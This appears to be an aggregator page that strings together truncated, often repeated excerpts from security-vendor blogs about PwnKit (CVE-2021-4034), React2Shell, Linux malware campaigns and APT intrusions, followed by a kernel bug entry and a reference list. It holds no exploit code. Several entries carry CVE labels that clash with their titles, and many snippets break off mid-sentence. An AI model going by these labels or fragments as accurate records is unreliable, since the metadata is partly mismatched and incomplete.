## Introduction
On January 26, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2018-14634 to its Known Exploited Vulnerabilities (KEV) catalog . The same vulnerability was discovered by the Qualys Threat Research Unit (TRU) in September 2018.
We nicknamed it “Mutagen Astronomy” as a tribute to the 1992 film Sneakers . In that movie, the phrase “Setec Astronomy” is revealed as an anagram for “Too Many Secrets.” Following that tradition, “Mutagen Astronomy” is our anagram for “Too Many Arguments”, which precisely captures the technical root cause of this vulnera
Qualys
Mutagen Astronomy: A Linux Vulnerability’s Path to CISA KEV | Qualys
blogs_qualys·2026-02-02·CVSS 7.8
CVE-2018-14634 [HIGH] Mutagen Astronomy: A Linux Vulnerability’s Path to CISA KEV | Qualys
#### Table of Contents
- Introduction
- Why This Matters Now
- Looking Back: The Original Discovery
- Guidance for Security Teams
- A Note on Our Research Mission
- Conclusion
- Frequently Asked Questions (FAQs)
## Introduction
On January 26, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2018-14634 to its Known Exploited Vulnerabilities (KEV) catalog. The same vulnerability was discovered by the Qualys Threat Research Unit (TRU) in September 2018.
We nicknamed it “Mutagen Astronomy” as a tribute to the 1992 film Sneakers. In that movie, the phrase “Setec Astronomy” is revealed as an anagram for “Too Many Secrets.” Following that tradition, “Mutagen Astronomy” is our anagram for “Too Many Arguments”, which precisely captures the technical root cause of this
Wiz
React2Shell Deep Dive: CVE-2025-55182 Exploit Mechanics | Wiz Blog
blogs_wiz·2025-12-08·CVSS 10.0
CVE-2025-55182 [CRITICAL] React2Shell Deep Dive: CVE-2025-55182 Exploit Mechanics | Wiz Blog
## Update Log
17-12-2025 - Added information about new post exploitation payloads utilizing Node for fileless persistence and exfiltration.
## Introduction
The disclosure of CVE-2025-55182, a critical Remote Code Execution (RCE) vulnerability in React, has sent shockwaves through the industry. Dubbed "React2Shell," this vulnerability allows attackers to bypass security boundaries and execute arbitrary code on the server by exploiting improper input deserialization within React Server Components (RSC).
While initial reports have rightly focused on Next.js due to its massive popularity and default exposure, our research indicates the rabbit hole goes much deeper. This is not merely a framework-specific bug; it is a fundamental issue with how RSC payloads are handled, with implications re
Wiz
React2Shell Deep Dive: CVE-2025-55182 Exploit Mechanics | Wiz Blog
blogs_wiz·2025-12-08·CVSS 10.0
CVE-2025-55182 [CRITICAL] React2Shell Deep Dive: CVE-2025-55182 Exploit Mechanics | Wiz Blog
## Update Log
17-12-2025 - Added information about new post exploitation payloads utilizing Node for fileless persistence and exfiltration.
## Introduction
The disclosure of CVE-2025-55182 , a critical Remote Code Execution (RCE) vulnerability in React, has sent shockwaves through the industry. Dubbed " React2Shell ," this vulnerability allows attackers to bypass security boundaries and execute arbitrary code on the server by exploiting improper input deserialization within React Server Components (RSC).
While initial reports have rightly focused on Next.js due to its massive popularity and default exposure, our research indicates the rabbit hole goes much deeper. This is not merely a framework-specific bug; it is a fundamental issue with how RSC payloads are handled, with implications
Unit42
The Covert Operator's Playbook: Infiltration of Global Telecom Networks
blogs_unit42·2025-07-29
The Covert Operator's Playbook: Infiltration of Global Telecom Networks
## Executive Summary
Unit 42 has observed multiple incidents targeting the telecommunications industry in Southwest Asia. We are currently tracking this activity as CL-STA-0969. This activity includes attacking and leveraging interconnected mobile roaming networks. This report provides a technical analysis of the activity cluster based on our incident response engagements including observed tactics, techniques and procedures (TTPs).
We found no clear evidence of data collection or exfiltration from the investigated systems and networks, nor any attempts to track or communicate with target devices within mobile networks. However, the threat actor behind CL-STA-0969 maintained high operational security (OPSEC) and employed various defense evasion techniques to avoid detection.
The actors
Unit42
The Covert Operator's Playbook: Infiltration of Global Telecom Networks
blogs_unit42·2025-07-29
The Covert Operator's Playbook: Infiltration of Global Telecom Networks
## The Covert Operator's Playbook: Infiltration of Global Telecom Networks
Renzon Cruz
Nicolas Bareil
Navin Thomas
Published: July 29, 2025
Malware
Threat Actor Groups
Threat Research
Vulnerabilities
Advanced Persistent Threat
Backdoor
CL-STA-0969
GALLIUM
GoLang
Liminal Panda
PingPull
Telecoms
UNC1945
UNC2891
UNC3886
## Executive Summary
Unit 42 has observed multiple incidents targeting the telecommunications industry in Southwest Asia. We are currently tracking this activity as CL-STA-0969 . This activity includes attacking and leveraging interconnected mobile roaming networks. This report provides a technical analysis of the activity cluster based on our incident response engagements including observed tactics, techniques and procedures (TTPs).
We found no clear
Bleepingcomputer
Linux malware “perfctl” behind years-long cryptomining campaign
blogs_bleepingcomputer·2024-10-03·CVSS 7.8
CVE-2023-33246 [HIGH] Linux malware “perfctl” behind years-long cryptomining campaign
## Linux malware “perfctl” behind years-long cryptomining campaign
## Bill Toulas
The researchers have also observed exploitation of CVE-2023-33246 , a remote command execution impacting Apache RocketMQ versions 5.1.0 and older, and CVE-2021-4034 (PwnKit), an elevation of privilege flaw in Polkit.
Once initial access is established, the packed and obfuscated payload, named "httpd," is downloaded from the attacker's server and executed. It then copies itself in the /tmp directory under the "sh" name and then deletes the original binary.
The new process assumes the same name ("sh"), essentially blending with normal Linux system operations.
Additional copies are created in other system locations, such as "/root/.config," "/usr/bin/" and "usr/lib" to ensure persistence in the case of a cl
Elastic
Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse — Elastic Security Labs
blogs_elastic·2024-09-27
Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse — Elastic Security Labs
27 September 2024•Remco Sprooten•Ruben Groenewoud
# Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse
The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels.
21 min readMalware Analysis, Threat Intelligence
## Introduction
In recent months, Elastic Security Labs has uncovered a sophisticated Linux malware campaign targeting vulnerable servers. The attackers initiated the compromise in March 2024 by exploiting an Apache2 web server. Gaining initial access the threat actors deployed a complex intrusion set to establish persistence and expand their control over the compromised host.
The threat actors utilized a mix
Securelist
Exploits and vulnerabilities in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Exploits and vulnerabilities in Q2 2024
Table of Contents
Statistics on registered vulnerabilities
Vulnerability exploitation statistics
Windows and Linux vulnerability exploitation
Most common exploits
Vulnerability exploitation in APT attacks
Exploiting vulnerable drivers to attack operating systems
BYOVD attack tools
Interesting vulnerabilities
CVE-2024-26169 (WerKernel.sys)
CVE-2024-26229 (csc.sys)
CVE-2024-4577 (PHP CGI)
Takeaways and recommendations
Authors
Vitaly Morgunov
Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not h
Securelist
Analyzing the vulnerability landscape in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Analyzing the vulnerability landscape in Q2 2024
Table of Contents
- Statistics on registered vulnerabilities
- Vulnerability exploitation statistics
- Vulnerability exploitation in APT attacks
- Exploiting vulnerable drivers to attack operating systems
- Interesting vulnerabilities
- CVE-2024-26169 (WerKernel.sys)
- CVE-2024-26229 (csc.sys)
- CVE-2024-4577 (PHP CGI)
- Takeaways and recommendations
Authors
- Vitaly Morgunov
- Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not have to be fresh, since attackers themselves deliver unpatched drivers to t
Trendmicro
Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks
blogs_trendmicro·2024-03-18
Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks
APT & Targeted Attacks
# Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks
Since early 2022, we have been monitoring an APT campaign that targets several government entities worldwide, with a strong focus in Southeast Asia, but also seen targeting Europe, America, and Africa.
By: Joseph C Chen, Daniel Lunghi
2024/03/18
Read time: ( words)
Save to Folio
## Introduction
Since early 2022, we have been monitoring an APT campaign that targets several government entities worldwide, with a strong focus in Southeast Asia, but also seen targeting Europe, America, and Africa. The threat actor exploits public-facing servers and sends spear phishing emails to deliver previously unseen backdoors.
Our research allowed us to identify the campaign’s multiple connect
Dfir Report
Lets Open(Dir) Some Presents: An Analysis of a Persistent Actor’s Activity
blogs_dfir_report·2023-12-18
Lets Open(Dir) Some Presents: An Analysis of a Persistent Actor’s Activity
From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion Read More
- dragonforce Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs Read More
Services Overview
Threat Hunting
-
Integration
CTI Program Advisory
Incident Response Playbook
About us
Contact Us
Collaboration
Careers
Analysts
Access DFIR Labs
Get in Touch
Public Reports
Products Overview
Threat intel Overview
Threat Feed
Private DFIR Reports
All Intel
Active Defense
DFIR Labs
Case Artifacts
Detection Pack
AI Training Ground
Service Overview
Threat Hunting
Integration
CTI Program Advisory
Incident Response Playbook
Company Overview
About us
Contact Us
Careers
Analyst
SQL Brute Force Leads to BlueSky Ransomware
From OneNote to RansomNote: An Ice Col
Bleepingcomputer
Privilege elevation exploits used in over 50% of insider attacks
blogs_bleepingcomputer·2023-12-08
Privilege elevation exploits used in over 50% of insider attacks
## Privilege elevation exploits used in over 50% of insider attacks
## Bill Toulas
Elevation of privilege flaws are the most common vulnerability leveraged by corporate insiders when conducting unauthorized activities on networks, whether for malicious purposes or by downloading risky tools in a dangerous manner.
A report by Crowdstrike based on data gathered between January 2021 and April 2023 shows that insider threats are on the rise and that using privilege escalation flaws is a significant component of unauthorized activity.
According to the report, 55% of insider threats logged by the company rely on privilege escalation exploits, while the remaining 45% unwittingly introduce risks by downloading or misusing offensive tools.
Rogue insiders typically turn against their employer b
Talos
Alchimist: A new attack framework in Chinese for Mac, Linux and Windows
blogs_talos·2022-10-13·CVSS 7.8
[HIGH] Alchimist: A new attack framework in Chinese for Mac, Linux and Windows
## Alchimist: A new attack framework in Chinese for Mac, Linux and Windows
Contributions from Matt Thaxton.
Cisco Talos discovered a new attack framework including a command and control (C2) tool called "Alchimist" and a new malware "Insekt" with remote administration capabilities.
The Alchimist has a web interface in Simplified Chinese with remote administration features.
The attack framework is designed to target Windows, Linux and Mac machines.
Alchimist and Insekt binaries are implemented in GoLang.
This campaign consists of additional bespoke tools such as a MacOS exploitation tool, a custom backdoor and multiple off-the-shelf tools such as reverse proxies.
Cisco Talos has discovered a new single-file command and control (C2) framework the authors call "Alchimist [sic]." Talos
Talos
Alchimist: A new attack framework in Chinese for Mac, Linux and Windows
blogs_talos·2022-10-13·CVSS 7.8
[HIGH] Alchimist: A new attack framework in Chinese for Mac, Linux and Windows
Contributions from Matt Thaxton.
- Cisco Talos discovered a new attack framework including a command and control (C2) tool called "Alchimist" and a new malware "Insekt" with remote administration capabilities.
- The Alchimist has a web interface in Simplified Chinese with remote administration features.
- The attack framework is designed to target Windows, Linux and Mac machines.
- Alchimist and Insekt binaries are implemented in GoLang.
- This campaign consists of additional bespoke tools such as a MacOS exploitation tool, a custom backdoor and multiple off-the-shelf tools such as reverse proxies.
Cisco Talos has discovered a new single-file command and control (C2) framework the authors call "Alchimist [sic]." Talos researchers found this C2 on a server that had a file listing active o
Qualys
Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls
blogs_qualys·2022-08-23
Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls
## Table of Contents
Why Are Zero-Day Attacks/Exploits so Dangerous?
How Qualys Policy Compliance Helps Combat Zero-Day Threats
Benefit of Qualys Policy Compliance for Zero-Day Threats
Summary
Getting Started
Contributors
Zero-day vulnerability attacks have emerged as a major cybersecurity threat in the last few years. Organizations most often targeted include large enterprises and government/Federal agencies. However, any organization, regardless of its size, business, or industry, is a potential target for zero-day threats.
Most notably, already publicly disclosed. This means that one out of every four zero-day exploits detected could potentially have been avoided if a more thorough investigation and patching effort had been pursued. In 2021, around 58 zero-day vulnerabilities we
Volexity
DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
blogs_volexity·2022-06-15
DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
Threat Intelligence
# DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
June 15, 2022
Steven Adair, Tom Lancaster, and Volexity Threat Research
Volexity frequently works with individuals and organizations heavily targeted by sophisticated, motivated, and well-equipped threat actors from around the world. Some of these individuals or organizations are attacked infrequently or on an irregular basis, while others see a barrage of attacks nearly every week. Regardless of the attack frequency, Volexity keeps its guard up, looking for new and old threats however they manifest themselves.
Earlier this year, Volexity detected a sophisticated attack against a customer that is heavily targeted by multiple Chinese advanced persistent threat (APT) groups. This particula
Volexity
DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
blogs_volexity·2022-06-15
DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
Threat Intelligence
## DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
June 15, 2022
Steven Adair, Tom Lancaster, and Volexity Threat Research
Volexity frequently works with individuals and organizations heavily targeted by sophisticated, motivated, and well-equipped threat actors from around the world. Some of these individuals or organizations are attacked infrequently or on an irregular basis, while others see a barrage of attacks nearly every week. Regardless of the attack frequency, Volexity keeps its guard up, looking for new and old threats however they manifest themselves.
Earlier this year, Volexity detected a sophisticated attack against a customer that is heavily targeted by multiple Chinese advanced persistent threat (APT) groups. This particul
Trendmicro
This Week in Security News - February 18, 2022
blogs_trendmicro·2022-02-18
This Week in Security News - February 18, 2022
Cyber Threats
# This Week in Security News - February 18, 2022
SMS PVA services' use of infected Android phones reveals flaws in SMS verification, and 'Russian state-sponsored cyber actors' cited in hacks of U.S. defense contractors
By: Jon Clay
2022/02/18
Read time: ( words)
Save to Folio
Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, learn about how to criminals can misuse SMS PVA services to conduct fraud. Also, read about a recent alert from the Cybersecurity and Infrastructure Security Agency on ‘Russian state-sponsored’ cyber actors.
Read on:
SMS PVA Services' Use of Infected Android Phones Reveals Flaws in SMS Verification
There has been an increase in short message ser
Trendmicro
Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
blogs_trendmicro·2022-02-11·CVSS 7.8
CVE-2021-4034 [HIGH] Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
Exploits & Vulnerabilities
## Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
This blog discusses how CVE-2021-4034 can be detected and blocked using Trend Micro™ Vision One™ and Trend Micro Cloud One™.
By: Sunil Bharti, Nitesh Surana Feb 11, 2022 Read time: ( words)
Save to Folio
PolKit, or PolicyKit, is a component that handles system-wide policies and authorizations in Unix and Unix-like operating systems (OS), allowing non-privileged processes to communicate with privileged ones. PolKit’s pkexec comes bundled in major Linux distributions, a tool generally used to execute commands with elevated privileges (root capabilities). The component also enables an authorized user to execute programs as another user (generally ‘root’). The function is synonymou
Trendmicro
Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
blogs_trendmicro·2022-02-11·CVSS 7.8
CVE-2021-4034 [HIGH] Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
Exploits y vulnerabilidades
## Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
This blog discusses how CVE-2021-4034 can be detected and blocked using Trend Micro™ Vision One™ and Trend Micro Cloud One™.
By: Sunil Bharti Feb 11, 2022 Read time: ( words)
Save to Folio
PolKit, or PolicyKit, is a component that handles system-wide policies and authorizations in Unix and Unix-like operating systems (OS), allowing non-privileged processes to communicate with privileged ones. PolKit’s pkexec comes bundled in major Linux distributions, a tool generally used to execute commands with elevated privileges (root capabilities). The component also enables an authorized user to execute programs as another user (generally ‘root’). The function is synonymous to ‘runas’ i
Trendmicro
Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
blogs_trendmicro·2022-02-11·CVSS 7.8
CVE-2021-4034 [HIGH] Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
Exploits & Vulnerabilities
## Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
This blog discusses how CVE-2021-4034 can be detected and blocked using Trend Micro™ Vision One™ and Trend Micro Cloud One™.
By: Sunil Bharti, Nitesh Surana 2022/02/11 Read time: ( words)
Save to Folio
PolKit, or PolicyKit, is a component that handles system-wide policies and authorizations in Unix and Unix-like operating systems (OS), allowing non-privileged processes to communicate with privileged ones. PolKit’s pkexec comes bundled in major Linux distributions, a tool generally used to execute commands with elevated privileges (root capabilities). The component also enables an authorized user to execute programs as another user (generally ‘root’). The function is synonymous
Trendmicro
Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
blogs_trendmicro·2022-02-11·CVSS 7.8
CVE-2021-4034 [HIGH] Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
Exploits & Vulnerabilities
# Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
This blog discusses how CVE-2021-4034 can be detected and blocked using Trend Micro™ Vision One™ and Trend Micro Cloud One™.
By: Sunil Bharti, Nitesh Surana
2022/02/11
Read time: ( words)
Save to Folio
PolKit, or PolicyKit, is a component that handles system-wide policies and authorizations in Unix and Unix-like operating systems (OS), allowing non-privileged processes to communicate with privileged ones. PolKit’s pkexec comes bundled in major Linux distributions, a tool generally used to execute commands with elevated privileges (root capabilities). The component also enables an authorized user to execute programs as another user (generally ‘root’). The function is synonymous
Trendmicro
Trend Micro XDR-Lösungen entschärfen PwnKit-Lücke
blogs_trendmicro·2022-02-11·CVSS 7.8
CVE-2021-4034 [HIGH] Trend Micro XDR-Lösungen entschärfen PwnKit-Lücke
Ausnutzung von Schwachstellen
## Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
This blog discusses how CVE-2021-4034 can be detected and blocked using Trend Micro™ Vision One™ and Trend Micro Cloud One™.
By: Sunil Bharti Feb 11, 2022 Read time: ( words)
Save to Folio
Originalartikel von Sunil Bharti, Nitesh Surana, Threat Researchers
PolKit oder PolicyKit ist eine Komponente, die systemweite Richtlinien und Berechtigungen in Unix und Unix-ähnlichen Betriebssystemen verwaltet und es nicht privilegierten Prozessen ermöglicht, mit privilegierten zu kommunizieren. PolKits pkexec wird in den meisten Linux-Distributionen mitgeliefert. Es ist ein Tool, das im Allgemeinen zur Ausführung von Befehlen mit erhöhten Rechten (Root-Berechtigungen) verwendet wird. D
Trendmicro
Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
blogs_trendmicro·2022-02-11·CVSS 7.8
CVE-2021-4034 [HIGH] Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
Sfruttamento vulnerabilità
## Detecting PwnKit (CVE-2021-4034) Using Trend Micro™ Vision One™ and Cloud One™
This blog discusses how CVE-2021-4034 can be detected and blocked using Trend Micro™ Vision One™ and Trend Micro Cloud One™.
By: Sunil Bharti Feb 11, 2022 Read time: ( words)
Save to Folio
PolKit, or PolicyKit, is a component that handles system-wide policies and authorizations in Unix and Unix-like operating systems (OS), allowing non-privileged processes to communicate with privileged ones. PolKit’s pkexec comes bundled in major Linux distributions, a tool generally used to execute commands with elevated privileges (root capabilities). The component also enables an authorized user to execute programs as another user (generally ‘root’). The function is synonymous to ‘runas’ in
Qualys
PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)
blogs_qualys·2022-01-25·CVSS 7.8
[HIGH] PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)
## Table of Contents
About Polkit pkexec for Linux
Potential Impact of PwnKit Vulnerability
Vulnerability Disclosure Timeline
Proof of Concept Video of PwnKit Exploit
PwnKit Scan Video
Technical Details of PwnKit Vulnerability
Solution: How to Patch the PwnKit Vulnerability
About Polkit pkexec for Linux
Discover Vulnerable Linux Servers Using Qualys VMDR
Patch With Qualys VMDR
Vendor References
Frequently Asked Questions (FAQs)
The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
Qualys
CVE-2021-4034: How PwnKit Exploits Polkit’s pkexec | Qualys
blogs_qualys·2022-01-25·CVSS 7.8
CVE-2021-4034 [HIGH] CVE-2021-4034: How PwnKit Exploits Polkit’s pkexec | Qualys
#### Table of Contents
- About Polkit pkexec for Linux
- Potential Impact of PwnKit Vulnerability
- Vulnerability Disclosure Timeline
- Proof of Concept Video of PwnKit Exploit
- PwnKit Scan Video
- Technical Details of PwnKit Vulnerability
- Solution: How to Patch the PwnKit Vulnerability
- About Polkit pkexec for Linux
- Discover Vulnerable Linux Servers Using Qualys VMDR
- Patch With Qualys VMDR
- Vendor References
- Frequently Asked Questions (FAQs)
The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default
Crowdstrike
Hunting pwnkit (CVE-2021-4034) in Linux
blogs_crowdstrike·CVSS 7.8
CVE-2026-20929 [HIGH] Hunting pwnkit (CVE-2021-4034) in Linux
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Huntress
CVE-2021-4034 Vulnerability | Huntress
blogs_huntress·CVSS 7.8
CVE-2021-4034 [HIGH] CVE-2021-4034 Vulnerability | Huntress
CVE-2021-4034 Vulnerability
Published: 2/20/2025
Written by: Nadine Rozell
## What is CVE-2021-4034 Vulnerability?
CVE-2021-4034 (PwnKit) is a memory corruption vulnerability in Polkit’s pkexec utility. Polkit is an application-level toolkit for controlling system-wide privileges in Unix-like operating systems. pkexec is a SUID-root program that lets an authorized user execute commands as another user, including the all-powerful root user. The vulnerability allows any unprivileged local user to gain full root privileges, effectively giving them the keys to the kingdom.
## When was it discovered?
The vulnerability was discovered by researchers at Qualys and disclosed on January 25, 2022. The scary part? The bug had been hiding in plain sight for over 12 years, meaning a massive number
Crowdstrike
The Anatomy of an ALPHA SPIDER Ransomware Attack
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] The Anatomy of an ALPHA SPIDER Ransomware Attack
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Crowdstrike
Hunting pwnkit (CVE-2021-4034) in Linux
blogs_crowdstrike·CVSS 7.8
CVE-2026-20929 [HIGH] Hunting pwnkit (CVE-2021-4034) in Linux
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand AT
Crowdstrike
How Insiders Use Vulnerabilities Against Organizations
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] How Insiders Use Vulnerabilities Against Organizations
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Bugzilla
CVE-2022-49264 kernel: exec: Force single empty string when argv is empty
bugzilla·2025-02-26·CVSS 7.8
CVE-2022-49264 [HIGH] CVE-2022-49264 kernel: exec: Force single empty string when argv is empty
CVE-2022-49264 kernel: exec: Force single empty string when argv is empty
In the Linux kernel, the following vulnerability has been resolved:
exec: Force single empty string when argv is empty
Quoting[1] Ariadne Conill:
"In several other operating systems, it is a hard requirement that the
second argument to execve(2) be the name of a program, thus prohibiting
a scenario where argc < 1. POSIX 2017 also recommends this behaviour,
but it is not an explicit requirement[2]:
The argument arg0 should point to a filename string that is
associated with the process being started by one of the exec
functions.
...
Interestingly, Michael Kerrisk opened an issue about this in 2008[3],
but there was no consensus to support fixing this issue then.
Hopefully now that CVE-2021-4034 shows practical exp
http://packetstormsecurity.com/files/166196/Polkit-pkexec-Local-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/166200/Polkit-pkexec-Privilege-Escalation.htmlhttps://access.redhat.com/security/vulnerabilities/RHSB-2022-001https://bugzilla.redhat.com/show_bug.cgi?id=2025869https://cert-portal.siemens.com/productcert/pdf/ssa-330556.pdfhttps://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683https://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txthttps://www.secpod.com/blog/local-privilege-escalation-vulnerability-in-major-linux-distributions-cve-2021-4034/https://www.starwindsoftware.com/security/sw-20220818-0001/https://www.suse.com/support/kb/doc/?id=000020564http://packetstormsecurity.com/files/166196/Polkit-pkexec-Local-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/166200/Polkit-pkexec-Privilege-Escalation.htmlhttps://access.redhat.com/security/vulnerabilities/RHSB-2022-001https://bugzilla.redhat.com/show_bug.cgi?id=2025869https://cert-portal.siemens.com/productcert/pdf/ssa-330556.pdfhttps://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683https://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txthttps://www.secpod.com/blog/local-privilege-escalation-vulnerability-in-major-linux-distributions-cve-2021-4034/https://www.starwindsoftware.com/security/sw-20220818-0001/https://www.suse.com/support/kb/doc/?id=000020564https://www.vicarius.io/vsociety/posts/pwnkit-pkexec-lpe-cve-2021-4034https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-4034
2022-01-28
Published
2022-06-27
Added to CISA KEV
Exploited in the wild